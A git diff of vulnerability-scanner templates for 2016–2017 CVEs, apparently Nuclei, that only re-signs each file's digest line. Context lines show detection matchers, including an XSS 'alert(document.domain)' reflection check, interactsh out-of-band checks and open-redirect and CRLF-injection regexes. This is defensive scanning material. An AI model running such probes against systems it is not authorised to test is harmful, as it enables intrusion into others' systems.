a/http/cves/2016/CVE-2016-1000149.yaml +++ b/http/cves/2016/CVE-2016-1000149.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d334015dd9ba6694bdd6bdab650cd81364fbff781687d1005f962218ed50097702201592398ce3d811966592a2774ad808225c335516750c7244e8b1b1297a53c079:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022009029953295349c4e81b6d0d11d5a6600ebf0d90eef2e32d78143414e9387e9d0221008b132abf1f395a139dd3aa0eefe38486054ca70209f01bdb8990d7e83b7318a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000154.yaml b/http/cves/2016/CVE-2016-1000154.yaml index 4bdcd73d1c..f79d3fc41b 100644 --- a/http/cves/2016/CVE-2016-1000154.yaml +++ b/http/cves/2016/CVE-2016-1000154.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022010b00e1e03da20057e11b9152c3ec9cdd135118a3e22499c4c9cc622d550ce2b0221008caf70e5704962de26782ade15ec49d697a240e0312070326cabc183e25e3137:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ca2b31ff2f83ccd4ee6513321136f5020f5ea49549298a2369adb8c54ae01be8022100bf02254bf633a2592d0ebb3da302b02c9b8467787e456b74002e6d8329caba18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1000155.yaml b/http/cves/2016/CVE-2016-1000155.yaml index 75a648142a..9f3ac293c7 100644 --- a/http/cves/2016/CVE-2016-1000155.yaml +++ b/http/cves/2016/CVE-2016-1000155.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b4e31a8e20f62df5ed1fbd6d516cf3aaac3613b05365f1a879d1f172e75a75ac022047808d416888877371ac41b66272a681fb7cfc3d4a34a4d165f6e1671ee51dc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022028714ab0ae776313a89a1a83d16078998420d0259c83dd9245278a1885f94e0302210083dac941158df2bbe47e48107a7ec08600a8434ffe56950ecaebae644b436ef3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10033.yaml b/http/cves/2016/CVE-2016-10033.yaml index d98cfcbb75..e07a31526d 100644 --- a/http/cves/2016/CVE-2016-10033.yaml +++ b/http/cves/2016/CVE-2016-10033.yaml @@ -65,4 +65,4 @@ http: - 'Author:(?:[A-Za-z0-9 -\_="]+)?<span(?:[A-Za-z0-9 -\_="]+)?>([A-Za-z0-9]+)<\/span>' internal: true part: body -# digest: 490a00463044022033411a2aca61b97b205301cdb8eef8ef57c3467165cbe4c0c9a9c547cb8965e50220406a74e33b928a171ca810378162a6b315449d70e1b8059b12a752a0d61c2229:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009528ca4f67e11fbcd8b18e6d2efb805ce25f9d0788175537480cb1bdab15695702203bcd33bb55f89932547aeddf042d65ba26776ced89eff267fb4f2424f2eec0e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10108.yaml b/http/cves/2016/CVE-2016-10108.yaml index 702f68e8a6..19cf472b00 100644 --- a/http/cves/2016/CVE-2016-10108.yaml +++ b/http/cves/2016/CVE-2016-10108.yaml @@ -45,4 +45,4 @@ http: - contains(interactsh_protocol, "dns") - status_code == 200 condition: and -# digest: 4a0a00473045022009c2486f30becc2499ca04c5fd0ac65f865b151e080af9af519b44a6d8dd42db022100b5c4bd69f88ec99e269d3b35db9eabdcffed4cb8a89aea1aa13bc5576b8349f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220351cffb23009540be03abde85635acf590303ae2297d629b88db27a7d1d7cff802200127e1f9ffee3c57b152667745d8dce32de3fc3978f3831ddebe3b7809c8897b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10134.yaml b/http/cves/2016/CVE-2016-10134.yaml index 928b20a505..e1a3875b5a 100644 --- a/http/cves/2016/CVE-2016-10134.yaml +++ b/http/cves/2016/CVE-2016-10134.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022002af95be90d34c083687132956f3fddac7b02d6c5bde40cad1957ff829e41a4b022100bec226073019d0c0c6a39cd446db71450cea262f0ed5a9b880e9b6c6fb46f340:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022064a357e04bfbda7eb1c4bbea5da2de7e8f09f1f848068a06e4d55b7cb2497fda022100ade13f3934e3425bb93c2be505bd6aec8eeec5ed9fc69c84515e92da8a4d3d54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10367.yaml b/http/cves/2016/CVE-2016-10367.yaml index fed3c400cf..f99d4589fe 100644 --- a/http/cves/2016/CVE-2016-10367.yaml +++ b/http/cves/2016/CVE-2016-10367.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 404 -# digest: 4b0a00483046022100e45cbb5ec1e7ce9a8197b7f9cbdc7f7bfb9d89d7e983f6768c0c94b05fd91dd1022100e883d7b49b27776141743b2d5eb0b5ab4e18468dce7bf589f9a2a0b02ad0b090:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f475aa06b90130e2b8e28420ca4e0e3d4b009c40aa6a2f5424c85eb78dd4a0790221009c477bdc34bc528ca9464c768743191bbeb359f13af23fc1671c883716c0c151:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10368.yaml b/http/cves/2016/CVE-2016-10368.yaml index 1c4eb8cc3d..c777e69f54 100644 --- a/http/cves/2016/CVE-2016-10368.yaml +++ b/http/cves/2016/CVE-2016-10368.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 302 -# digest: 490a0046304402205efe425e5d9b18e4d0fbbc16efa3c8463f7588294009126f1ce333acc1f041de0220194d5a323c78df75dd1216016dc142581916068c79129fc2159ea61553b623b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100948052a5f3f4171269d27e8daf23f0aca9164b893bf2822e7c0d2db498ab1d39022100fe953696d9917f183fc424ce4c326a4de79ff5cd78483a6e718be65ce5da853d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10924.yaml b/http/cves/2016/CVE-2016-10924.yaml index 185382a673..c1ba89ba21 100644 --- a/http/cves/2016/CVE-2016-10924.yaml +++ b/http/cves/2016/CVE-2016-10924.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022035463ec47dab2e9697b6674a8af15173fe0695e388c6704ee510f3d410ef89e8022100ad37ebb93323af593940c5eece752836b5f4ca33475290dcf8601e11cfe00fd8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210085fc3986ae66d40990e4a31f02cda6025e0cf6c150b726abb5ee64d8b910edf6022030737c9f147c5262287ddeb3743d846c5b60018f119a3e2ca38e94b557e03376:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10956.yaml b/http/cves/2016/CVE-2016-10956.yaml index 9f95b59b3d..2a721c1141 100644 --- a/http/cves/2016/CVE-2016-10956.yaml +++ b/http/cves/2016/CVE-2016-10956.yaml @@ -48,4 +48,4 @@ http: status: - 200 - 500 -# digest: 490a00463044022039d06d4aa7a538325a7def0732a690e76353bd439cec6d8585bccf59a180048002205b9232ef9dbcf11df674e2c295d9a64257cd54d42501c853019ff131e47e7741:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220538fc9ea958512767f2d8fe5e57e99b3b4b808a9034b6cf8f3c478c6274aad010220449e8eb0d19a0ee9a4d3baa931168afff6b0a7b8460414d2689d358e61a2688f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10973.yaml b/http/cves/2016/CVE-2016-10973.yaml index fcfe76565d..f2782f9f85 100644 --- a/http/cves/2016/CVE-2016-10973.yaml +++ b/http/cves/2016/CVE-2016-10973.yaml @@ -50,4 +50,4 @@ http: - 'contains(body_2, "tab = alert(document.domain);")' - 'contains(body_2, "Brafton Article Loader")' condition: and -# digest: 490a004630440220056398545c7971a832b6a0a6562ed13c279b426e0b8783134e5536c67d1a589d0220409848bc2ce496563f76afcdeb4851709c338b118dba11b50c81cefc0a171f67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220794dbf512a1810009e7cd3e7bbb640cd76c0dc11d6c8f18bd09c931247485bc0022100e47ff8d6c0f657e433480f8453d0ef5bdb478696a22d503a10f7fb8a3976a91a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10993.yaml b/http/cves/2016/CVE-2016-10993.yaml index 8ab955c6c9..7c8f173112 100644 --- a/http/cves/2016/CVE-2016-10993.yaml +++ b/http/cves/2016/CVE-2016-10993.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205a861ba8febc9300fb6d1aa1ed02ef760e621783766ea29d336f8ac3dd2e10e2022035d451e147d56cdaf09231f43635e84b6263c7e74ec48c0fa59272f97264a0a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100edeeec357936c76c423de1da0e437b54e39b127084bf49d257d6fa40404537df02201b36b8f48e27504b38ea201e03181d77572ba400564be65921717a8b78a39809:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-1555.yaml b/http/cves/2016/CVE-2016-1555.yaml index 7a9eaff751..e49e1523c5 100644 --- a/http/cves/2016/CVE-2016-1555.yaml +++ b/http/cves/2016/CVE-2016-1555.yaml @@ -44,4 +44,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4a0a0047304502202a0af6f4b5b74c37d86cf262d279ecf9a06914ec33fb6e7db00c710f0982ce60022100c68322772ed60b940af582741ea7d2816782e2641a7d654e563aa82ab3aedf98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204478df4d956ba1393b007b7d82f7002f9054f7f3b400190b8bf3097228d2735602207904edcf73de6619898d2e0d33cca582c04caa2d5a5d8003959520e439b8b17a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-2389.yaml b/http/cves/2016/CVE-2016-2389.yaml index 2536246317..1010f351b1 100644 --- a/http/cves/2016/CVE-2016-2389.yaml +++ b/http/cves/2016/CVE-2016-2389.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c0981ae3808610bcc8a7e8ab312d25bcf72ea0bb9e117d81d415d2632ad6ad3e022100e803bbfa6008004d6a0443f4c9e37201bf5b214ac7106ebdd2b96672c45ea5df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c0f5edb9dcfae071996574d4771f5371c930a81397ba6ea0d0f78b9df79b08610221009b7dc008da8799de3136a1311363e64efd38638efad47a5815f744dd08597efd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-3081.yaml b/http/cves/2016/CVE-2016-3081.yaml index 868ea59f72..1e8267e001 100644 --- a/http/cves/2016/CVE-2016-3081.yaml +++ b/http/cves/2016/CVE-2016-3081.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ac77a59d24373f8a33371c90c7e4275bd9cbd672278167a927b6b04d2066a1c4022100dc07b95c4a8afd4591d4fb49d9ac62d4cb34ac923b85398daa0a4e82aad7710d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009e0c0977c90d53736ce085938540079399fabd48a44beef5157e6f31f744aa3c022031ced870037d1b5f6dec56a3f31e42b00f7ab652b7ca75d399fa15ba4b69c094:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-3088.yaml b/http/cves/2016/CVE-2016-3088.yaml index 3312c41296..37dde34469 100644 --- a/http/cves/2016/CVE-2016-3088.yaml +++ b/http/cves/2016/CVE-2016-3088.yaml @@ -50,4 +50,4 @@ http: - "status_code_2==200" - "contains((body_2), '{{rand1}}')" condition: and -# digest: 490a0046304402206b7bd3e2e8e6558b6bd1ed2ed9786d1aa61b2f80c5153900102307acfbd8680302204f6528318fe66f51da0b6a08ecc218072d115dbdc42a066c07081d1a0dc1c58d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e9c55b0a4fd5097a215978a5b6010a918d459649c22eb4f1d753883da6f7b60e02210098985705a0228a24548b6efdeb0a9100b39af508de90ebf72528e0588f18cc75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-3978.yaml b/http/cves/2016/CVE-2016-3978.yaml index 2ebddc1154..087874bbff 100644 --- a/http/cves/2016/CVE-2016-3978.yaml +++ b/http/cves/2016/CVE-2016-3978.yaml @@ -40,4 +40,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 490a0046304402201e517dd06332c852dc9e8a03d12eb20c9636dfc194690a007024ef333e978dba022062abb7e6dbc6349bc055a6faeffa048a2b20388fd1893538783af9670b6e35e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b929553c26a8f5f0f26c3c88587748b9c2a2d2b3275fe12c5f9857e9cede65f5022100c799a6da8b81f359e5defd40655ff8a8351a0246c207ea9b754815cdbd2cf78d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-4975.yaml b/http/cves/2016/CVE-2016-4975.yaml index 4c3713b555..aba4c78863 100644 --- a/http/cves/2016/CVE-2016-4975.yaml +++ b/http/cves/2016/CVE-2016-4975.yaml @@ -39,4 +39,4 @@ http: part: header regex: - '(?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;)' -# digest: 4a0a004730450220591243f64cba0b0c03d215d27b7a16783b2fbfb438d316dddf5577fd604ee4ed022100bf652b4a095563057b28cc33ac56040cc57495913b1ae8057328d07775384658:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204f08206705552f730f7ad4e065175ade78aef2f56aeb31207f7f6cd92a2fadde022100d8eb6efe698663c3131c0423b0bde31d4866d579618b0cbfd46e9a507fea4b06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-5674.yaml b/http/cves/2016/CVE-2016-5674.yaml index 80c8c993fb..5b46f4904b 100644 --- a/http/cves/2016/CVE-2016-5674.yaml +++ b/http/cves/2016/CVE-2016-5674.yaml @@ -49,4 +49,4 @@ http: - "contains(body_2, 'Debugging Center')" - "contains(body_2, 'Windows IP')" condition: and -# digest: 4a0a004730450220385c9c6da58edd672651a5e46895e146cc465ebca8ee3b813d44d6f616d0c378022100811021f1ae97e681a6f84ee297e881a5e855bfaa37a652ccc045f2cee6aa21b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206fcc24413a4fab283dc7fd59efec560e4a1f7cd9cd5bf6ac8dd51f41ca604dda02210083c5fd74de3024e39a4fb365680ecbe183fbb381fc280030d510b36eedf92484:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-6195.yaml b/http/cves/2016/CVE-2016-6195.yaml index 31fe431833..38d141f86c 100644 --- a/http/cves/2016/CVE-2016-6195.yaml +++ b/http/cves/2016/CVE-2016-6195.yaml @@ -58,4 +58,4 @@ http: - 200 - 503 condition: or -# digest: 4a0a00473045022030269809613dc16694046c59ac978b011cbcc0e3fdc2021ebc2f19473ff08068022100b0d29f698de04fa6315694bcfc2096e474fd1b4c198284198f2a52cc101320bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022060d3b74c5e345660298a1474ea851ac0cdc6ed4d1be4c5e2cd84a49e2e79e06b0221008e2275a92a46a7525b4adc185cd37e7990f5b597f4217db969e2c4dc9a9f78db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-7552.yaml b/http/cves/2016/CVE-2016-7552.yaml index 2728c52e37..a632a4e242 100644 --- a/http/cves/2016/CVE-2016-7552.yaml +++ b/http/cves/2016/CVE-2016-7552.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d53117f3ea16788cf89c0cecf2d555cae0b79a93d5d3180b39cc4454040ef18d022100cd583d6df3b9dc10200910934624925f94565c114f1dd531e1cd98adc07c4544:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205edf4891203be2e982cb79823b11b89eb92d074d01b239e68fc73f47ff65a61702204967e0b4fc76d68dc0ff070d2513427e927cd8dafc5ab0c6c40780cd82096d32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-7981.yaml b/http/cves/2016/CVE-2016-7981.yaml index 0aa33cf5a9..647d30f54d 100644 --- a/http/cves/2016/CVE-2016-7981.yaml +++ b/http/cves/2016/CVE-2016-7981.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ee1a0cc74545408c97919b9f1220c0b8a04761f7969c872553fdf8d567516a3a022100a2caf1a3d02114b0e49b46a81c7ac45c62019029e4395dfa4ac12a9aa89935ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220108a509775dbaa87cc9ebc37fab6c4b29677f6ebba3b97c59dfc4a9599163916022100d5b68a149a425c74e250465df013918c58ca05d995f34ef2e1a43ed5aec34bb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-8527.yaml b/http/cves/2016/CVE-2016-8527.yaml index c98637a9a2..08f0b059a6 100644 --- a/http/cves/2016/CVE-2016-8527.yaml +++ b/http/cves/2016/CVE-2016-8527.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e0553f487ee2d58071813a5309f9348e9ca2cdaac784386a59e8c2d365bd1b7b022100de464f52b41938c66aeb7e2a014a9e466ad67eab9b926ec68cf7196538177e40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e9346e18bfb4c4d6a1081d41f4cd34352fa4d926162744dcc66b0333f6cb0b7f022100a130940d70233629a33858b36b594b16b3fac8249e1612e0dbee3f832cce06f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-0929.yaml b/http/cves/2017/CVE-2017-0929.yaml index b0e95f4acb..26fee7b905 100644 --- a/http/cves/2017/CVE-2017-0929.yaml +++ b/http/cves/2017/CVE-2017-0929.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 500 -# digest: 4a0a00473045022100a4588a8ca315453fd4058b17fc6b55294a5808948ad8e2a8ca6bc69acb3a6908022012c6ab4acc691ef16efbdbde3fab9cb0c476ae2aced25ad2a4669b8f2c7f2556:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100befaa1c664964744dd1d8c6722277a114b6f2fa28380c244ba22f633b8e4853f022100b73c8d2c36b64be027b558818fd39677eca39927dc0b235c7aa625e51ff7af1d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-1000028.yaml b/http/cves/2017/CVE-2017-1000028.yaml index 8431418b88..c65c4c1cff 100644 --- a/http/cves/2017/CVE-2017-1000028.yaml +++ b/http/cves/2017/CVE-2017-1000028.yaml @@ -51,4 +51,4 @@ http: - "contains(body, 'extensions')" - "status_code == 200" condition: and -# digest: 4a0a004730450220197143a221aff60682e5920e186b66ea318c0512f0d5433a907b9ece724df88b022100beab5d9053b43e2cac58d92a26aa2bdfec85b9cee740d246284232c2ba59e90e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022043d669b8b16a7809a014436363971008a066d6a54fbf8c71dbf3c34fca79a32f022044e14f43dee98fa0e180c5fe9276af9dca155fc864c7276e775e79ec1ac7eefa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-1000029.yaml b/http/cves/2017/CVE-2017-1000029.yaml index f3d13672d8..aa79fb0c3b 100644 --- a/http/cves/2017/CVE-2017-1000029.yaml +++ b/http/cves/2017/CVE-2017-1000029.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202b1ecb4a01d3db488f18d88e30890c01ab67d73172dcd959724ffd53e260af84022100d6f4a9096dc94f23108e95c441641bdee5d1b3a9ca2b8fd037cca63a94e1a6dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201d60e48b7384c0d1a88028a170cb3cfc91c63564ea817b87f9aa16c2e22f6277022100bd3d6df440665b69e2ed8f8e6bb14d03cea04068bdad5c4a9d18fbda46d3fe4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-10075.yaml b/http/cves/2017/CVE-2017-10075.yaml index 01a9c8319c..9d65bed09f 100644 --- a/http/cves/2017/CVE-2017-10075.yaml +++ b/http/cves/2017/CVE-2017-10075.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022010819a8a794f7913d5769d0d2a2fb4cb18e8bfc192f008923949764b6ee09b0902202313e8489672702f7e45dda26b24f2fc2e13a050288074feb90d080e5f3965af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220136c0d583ed2e4adb2dd235c30da23fd33f94e875621e8280c11bd82d39cd70502201c341e9c1a91f9cfbb120bf3f1a7a78b252f9a411ca56d43d46ae1a82a471290:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-10271.yaml b/http/cves/2017/CVE-2017-10271.yaml index 3cec81e3c6..fcbaed68bb 100644 --- a/http/cves/2017/CVE-2017-10271.yaml +++ b/http/cves/2017/CVE-2017-10271.yaml @@ -110,4 +110,4 @@ http: - body == "{{randstr}}" - status_code == 200 condition: and -# digest: 4b0a00483046022100cc1685ff29667003d078f1649e722afd7019dd57bfcb94fd210d4624aebdf5fd022100adcdc269c9a84770a1817b96f2a5513541930282e2cdb048fdf74c9e31f8e4d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206cd33e205787396c506930ef99f891dab85057ff329031f7f3fafb03a177a46b02201d620b81bc277a73773aff87d2ecf134cde30d6de18c3e92c63af21ce47f0407:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-11165.yaml b/http/cves/2017/CVE-2017-11165.yaml index 47cd2c3ca3..edf26c1b1b 100644 --- a/http/cves/2017/CVE-2017-11165.yaml +++ b/http/cves/2017/CVE-2017-11165.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022006d394921b0d5a7e04a3fd4c15837d306fae435cd168294f0200ce3c8b85c3de022100a28cc857dd6bb3e3b7914deddd731f3d7a9a721dd521879f221cff5c81597e3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022008a11ab9e93218a47e8c16b1c9fb7c47dc5316032ba4ef91e67ffa755d13d10c0220410b5f535e0ff53ec6b40a7946b186706170f2fe33bec547ebe0d73e36ce2491:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-11444.yaml b/http/cves/2017/CVE-2017-11444.yaml index 60d4828293..650fe12483 100644 --- a/http/cves/2017/CVE-2017-11444.yaml +++ b/http/cves/2017/CVE-2017-11444.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022054097ca889716ee0d3ffd26eccb31e1090cc41ee675729b96e5ec67138f7634c022043939c20b2460e4071b9a01a8d590cef58a83e2c49c0f73b1f517d3434666c0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b2343cc25b19e1ca3bd71b44003198237cb5901c4d7ebc10cf40e0e9b49fd6bf02203ea67091fb55c946949988fcfc0c892ed7166c3f42c21f180e21804e89046e75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-11512.yaml b/http/cves/2017/CVE-2017-11512.yaml index ae2c4977b6..d950a4c815 100644 --- a/http/cves/2017/CVE-2017-11512.yaml +++ b/http/cves/2017/CVE-2017-11512.yaml @@ -49,4 +49,4 @@ http: - "fonts" - "extensions" condition: and -# digest: 4a0a00473045022075475b13b0c988c21ece3fd5009fa0ed01ba7fef5c7daffb6579403d0bfdc831022100809a276461fd74d794533eaf19a7d5155c61d32b746d12ac53a958ef2f4dbaf6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c8643b425b2225117d524d7be9264b46eccff5a7a4daa81dc797d4d99d1d3190022064c2cf6f49d75d08b58057f6ee081777406f5020ed4851f896861f25d9b23f4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-11610.yaml b/http/cves/2017/CVE-2017-11610.yaml index 0fc1dd91b5..a426bd4003 100644 --- a/http/cves/2017/CVE-2017-11610.yaml +++ b/http/cves/2017/CVE-2017-11610.yaml @@ -67,4 +67,4 @@ http: - "<methodResponse>" - "<int>" condition: and -# digest: 490a0046304402201ad8588b21856c3e2e3cd9b2005efb3ab532688a03f56bfe6b6d4700adcfeb24022034a9d062ba9d9e21715b31256d921ca212e61f2266208cc6aac596dd63b3d22f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e8cffc12cec213b44e82f5d0f1309538f5f4bc2ad23587675ff7d09cebd9e62a022100b916e70325f22adc4270f97859f43348cd7b1a973716c95b908ba7ad5960e8b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12138.yaml b/http/cves/2017/CVE-2017-12138.yaml index c1061f11a2..fe3ecd31ed 100644 --- a/http/cves/2017/CVE-2017-12138.yaml +++ b/http/cves/2017/CVE-2017-12138.yaml @@ -46,4 +46,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a0047304502210086fe37ec367180de3965e272e7b960209ab80611b4c55bcd92d3b1cfda6074100220136441eb75bb6eeecb92bf19aa6776daade6154861d0ce3e94bbabdd66679817:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d50b605dc5d7aa83bf305787cb9d0325014343d2d679489b1beb3eb6f3f7ba3d022100d6797bb1079261616de2593b32cc99578347d5cd577e9c0dcf05eab86d23b240:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12149.yaml b/http/cves/2017/CVE-2017-12149.yaml index b9fa62b044..5f22928dd1 100644 --- a/http/cves/2017/CVE-2017-12149.yaml +++ b/http/cves/2017/CVE-2017-12149.yaml @@ -64,4 +64,4 @@ http: status: - 200 - 500 -# digest: 4b0a00483046022100ff07339440ed832558350d4e1909be660a2e00b68ca5777281e9e43e25195d8c022100f8797a6125eb10137f47322fda28c9b9075841e230dd91cacc849802e719af59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204d54cb73bed897ffa2b528315d091376b9a653bfcc5b630be98c4e439fa6bbfc022100898e6d8834740b6c30ccff30123bac61289499278d2d43eebd86790ee9846fe0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12544.yaml b/http/cves/2017/CVE-2017-12544.yaml index 6f54790839..4c3a6444ab 100644 --- a/http/cves/2017/CVE-2017-12544.yaml +++ b/http/cves/2017/CVE-2017-12544.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d6096a44064ff11a98cb2a3b0e4ea152b4e05f54485d6eb402c890697a0d3a7902205eda1523b2432502e783dad4db1ca29da4c467564da34d58541f827c4653f9ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c664906de3dbfed265f2b22def98c3be8115a90a6329d475abc146aed54b40590220232f4a4d20c1a0eabfee1bb1cf5bd6b769acee1a64e4ad2df72e4d026bb578ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12583.yaml b/http/cves/2017/CVE-2017-12583.yaml index b45f61def0..037219d39d 100644 --- a/http/cves/2017/CVE-2017-12583.yaml +++ b/http/cves/2017/CVE-2017-12583.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022040428c7102aee34ec9392abb1a5987369b001372f29a97e6592a24621b4deee302206d6c2d35e3f7dcf178bac29764bc37dc1b7b92218a5ca66ca4c21d133e32a5a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 